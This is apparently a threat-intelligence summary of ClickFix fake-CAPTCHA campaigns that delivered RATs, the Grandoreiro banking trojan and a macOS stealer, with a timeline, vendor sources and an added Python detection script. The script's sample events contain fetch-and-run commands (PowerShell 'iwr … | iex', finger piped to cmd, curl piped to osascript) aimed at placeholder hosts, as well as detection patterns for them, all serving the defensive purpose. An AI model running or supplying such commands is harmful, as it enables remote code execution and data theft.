ClickFix Campaigns Deliver Modular RATs, Banking Trojans, and macOS Stealers
Researchers reported multiple ClickFix campaigns using fake CAPTCHA or reCAPTCHA prompts to trick users into manually running malicious commands, with payloads tailored by platform and victim profile. On Windows, one campaign delivered a modular NodeJS-based RAT and infostealer through a malicious MSI installer, loading key capabilities only in memory after command-and-control was established and using gRPC over Tor for persistent communications. An operational security failure exposed the malware’s backend protocol definitions and admin panel API, revealing a malware-as-a-service operation with multi-operator support, Telegram alerts, automation rules, and cryptocurrency wallet tracking. The malware also fingerprinted victims extensively and established persistence through the Windows Run registry key as LogicOptimizer.
A separate ClickFix chain attributed with high confidence to Grandoreiro targeted users of eight Brazilian banks by luring victims through a fake reCAPTCHA page and launching a malicious PowerShell sequence that sideloaded a Delphi banking trojan with legitimate GoToMeeting and Nero binaries. The malware deployed banking overlays, intercepted PIX QR-code payments, added Microsoft Defender exclusions, and stole credentials, device information, signatures, and payment confirmation codes. Netskope also documented a macOS variant that used AppleScript and a persistent fake password dialog to harvest Keychain data, browser cookies, saved credentials, extension storage, and cryptocurrency wallet data; the theft of live session cookies can enable attackers to bypass MFA by hijacking authenticated sessions.

How this story unfolded
11 events from the most recent confirmed update back to the earliest known activity.
Huntress details BackgroundFix ClickFix chain delivering CastleLoader
Huntress reported a ClickFix-style campaign in which victims searching for background-removal tools were lured to malicious 'BackgroundFix' sites that placed a command on the clipboard for the victim to execute via the Windows Run dialog. The chain abused finger.exe to fetch a batch payload, downloaded Python-based stages, and ultimately deployed CastleLoader, which was observed delivering NetSupport RAT and an in-memory stealer dubbed CastleStealer.
Apple adds Terminal protections aimed at ClickFix-style lures
Netskope noted that macOS Tahoe 26.4 and macOS Sequoia introduced Terminal warnings intended to disrupt ClickFix social-engineering attacks that rely on users manually pasting malicious commands.
Netskope documents macOS ClickFix stealer variant
Netskope described a cross-platform ClickFix campaign delivering an AppleScript-based infostealer to macOS users through a fake CAPTCHA flow and repeated password prompts. The stealer collected Keychain data, browser credentials, cookies, extension storage, and cryptocurrency wallet data before exfiltrating it to 172.94.9.250.
Grandoreiro campaign targets eight Brazilian banks via ClickFix chain
Researchers observed a Grandoreiro-family banking trojan campaign using a fake reCAPTCHA ClickFix/ClearFake-style lure on canalmodup.com to trick victims into running malicious PowerShell. The operation used GoToMeeting and Nero WiFi+Transfer DLL sideloading and targeted eight major Brazilian banks with overlays and PIX QR-code interception.
Netskope exposes modular Windows RAT and leaked MaaS admin panel
Netskope Threat Labs reported a ClickFix campaign delivering a NodeJS-based modular Windows RAT/infostealer through a malicious MSI installer. The malware used gRPC over Tor, in-memory modules, and persistence via the LogicOptimizer Run key, while an operational security failure exposed protocol definitions and an admin panel API showing a mature multi-operator malware-as-a-service platform.
Breakglass links 333+ ClickFix infections to abused signed NetSupport RAT
Breakglass reported that attackers were abusing a legitimately EV-signed NetSupport Manager v14.12 binary as a RAT in two active delivery chains, including fake Cloudflare Turnstile/reCAPTCHA ClickFix pages that tricked users into pasting PowerShell. The report tied the activity to likely Russian-speaking MaaS operators, noted the infrastructure was still active, and published IOCs, hashes, domains, IPs, and detection guidance.
Breakglass reports ClickFix campaign weaponizing NetSupport RAT against Italian users
Breakglass disclosed a campaign distributing weaponized NetSupport Manager v14.10 via fake CAPTCHA or verification pages that tricked victims into pasting a PowerShell command. The operation targeted Italian users through spam emails and used signed NetSupport binaries with malicious config and license files, alongside multiple landing, delivery, and C2 domains.
Breakglass documents SectopRAT ClickFix campaign using 42 .in.net domains
Breakglass reported that from March 7 to March 9, 2026, attackers ran a ClickFix campaign that used 42 newly registered .in.net parent domains and at least 156 subdomains to trick victims into pasting a PowerShell command from fake Google verification pages. The infection chain deployed SectopRAT through a five-stage loader with layered encryption and Donut shellcode, and the infrastructure showed signs of bulk automation and links to the broader ACRStealer/Arechclient2 ecosystem.
Certificates issued for Grandoreiro campaign before activation
Breakglass observed that certificates tied to the canalmodup.com infrastructure were issued before the campaign became active, indicating preparation in advance of operations.
canalmodup.com registered for Grandoreiro campaign infrastructure
Breakglass reported that the domain canalmodup.com, later used in a ClickFix-style Grandoreiro campaign, was registered in December 2025 as part of pre-staged attacker infrastructure.
ClickFix social-engineering technique first observed
Netskope said the ClickFix technique was first seen in late 2024, using fake verification prompts to trick users into manually pasting malicious commands into Terminal or Windows Run dialogs.
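The entries above share one execution pattern a defender can key on: a shell is started from an interactive surface (the Windows Run dialog, whose parent is explorer.exe, or a macOS Terminal) with a command line that fetches remote content and pipes it into an interpreter, sometimes with lure text such as "I am not a robot" appended; persistence in the Windows case was a Run key value named LogicOptimizer. The following triage helper is an added example written for this page, not code from Huntress, Netskope or Breakglass. It scores constructed, Sysmon-shaped process-creation events against those traits and audits a constructed set of Run key values; the event dicts, hostnames, file paths and the `LogicOptimizer` path are all made up for illustration.

```python
"""Triage helper for ClickFix-style command execution (added example, not from
any vendor report summarized above). Input events are constructed dicts shaped
like Sysmon Event ID 1 (Image, ParentImage, CommandLine); nothing here reads a
live system."""
import re
from dataclasses import dataclass, field

# Interpreters the lures ask the victim to paste into Run / Terminal.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "bash", "sh", "zsh", "osascript"}
# Parents that indicate a human-typed command rather than a service or scheduled launch.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}

# Each rule: name, compiled regex evaluated over the lowercased command line.
RULES = [
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass")),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}")),
    ("remote_fetch", re.compile(r"iwr\b|invoke-webrequest|downloadstring|curl\s|wget\s|bitsadmin")),
    ("finger_lolbin", re.compile(r"\bfinger(\.exe)?\s+\S+@")),
    ("pipe_to_interpreter", re.compile(r"\|\s*(iex|invoke-expression|cmd|bash|sh|zsh|osascript)\b")),
    ("captcha_lure_text", re.compile(r"i am not a robot|verification id|ray id")),
]

@dataclass
class Verdict:
    suspicious: bool
    score: int
    hits: list = field(default_factory=list)

def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(event: dict) -> Verdict:
    """Return the rule hits for one process-creation event."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if image in SHELLS and parent in INTERACTIVE_PARENTS:
        hits.append("interactive_shell_launch")
    for name, rx in RULES:
        if rx.search(cmd):
            hits.append(name)
    # The lure needs both a human-driven launch and remote-execution traits; an admin
    # simply opening PowerShell from the Run dialog (one hit) must not alert.
    suspicious = "interactive_shell_launch" in hits and len(hits) >= 3
    return Verdict(suspicious, len(hits), hits)

# Directories a standard user can write to; autoruns pointing there deserve a look.
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\")

def audit_run_values(run_values: dict, watchlist=("logicoptimizer",)) -> list:
    """Flag Run-key values (name -> command) whose name is on a watchlist or whose
    command runs from a user-writable directory. Input is a constructed dict."""
    findings = []
    for name, command in run_values.items():
        reasons = []
        if name.lower() in watchlist:
            reasons.append("watchlisted_name")
        if USER_WRITABLE.search(command.lower()):
            reasons.append("user_writable_path")
        if reasons:
            findings.append((name, reasons))
    return findings

# Constructed sample events (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/a | iex" # I am not a robot'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd /c "finger user@example.invalid | cmd"'},
    {"Image": "/bin/bash",
     "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "CommandLine": 'bash -c "curl -fsSL http://example.invalid/x | osascript"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},  # benign: admin opening a shell
]

# Constructed Run-key snapshot; the LogicOptimizer path is invented for the example.
SAMPLE_RUN_VALUES = {
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    "LogicOptimizer": r"C:\Users\victim\AppData\Roaming\LogicOptimizer\node.exe",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        v = score_event(ev)
        print(f"{'ALERT ' if v.suspicious else 'ok    '} score={v.score} hits={v.hits}")
    print("run-key findings:", audit_run_values(SAMPLE_RUN_VALUES))
```

The threshold of three hits is a starting point, not a tuned value: the parent check alone is noisy, and the command-line rules alone would fire on legitimate automation run by services, so the verdict requires both. On a real telemetry feed the same structure applies to Sysmon, EDR or `unified log` process events once they are mapped to the three fields used here.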
Sources
ClickFix Removes Your Background but Leaves the Malware - Huntress
huntress.com
macOS ClickFix Campaign: AppleScript Stealers & New Terminal Protections - Netskope
netskope.com
Grandoreiro's ClickFix Era: A Fake reCAPTCHA, a GoToMeeting DLL Sideload, and PIX QR Interception Against Eight Brazilian Banks - Breakglass Intelligence
intel.breakglass.tech
From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel - Netskope
netskope.com
Signed, Sealed, Delivered: How a Legitimately-Signed NetSupport Binary Became a Weapon Across 333+ ClickFix Infections - Breakglass Intelligence
intel.breakglass.tech
Campaign #39: NetSupport RAT Weaponized via ClickFix Social Engineering at Scale - Breakglass Intelligence
intel.breakglass.tech
ClickFix Drops SectopRAT Through Three Encryption Layers: 42 Domains, 156 Subdomains, and a 48-Hour Infrastructure Blitz on .in.net - Breakglass Intelligence
intel.breakglass.tech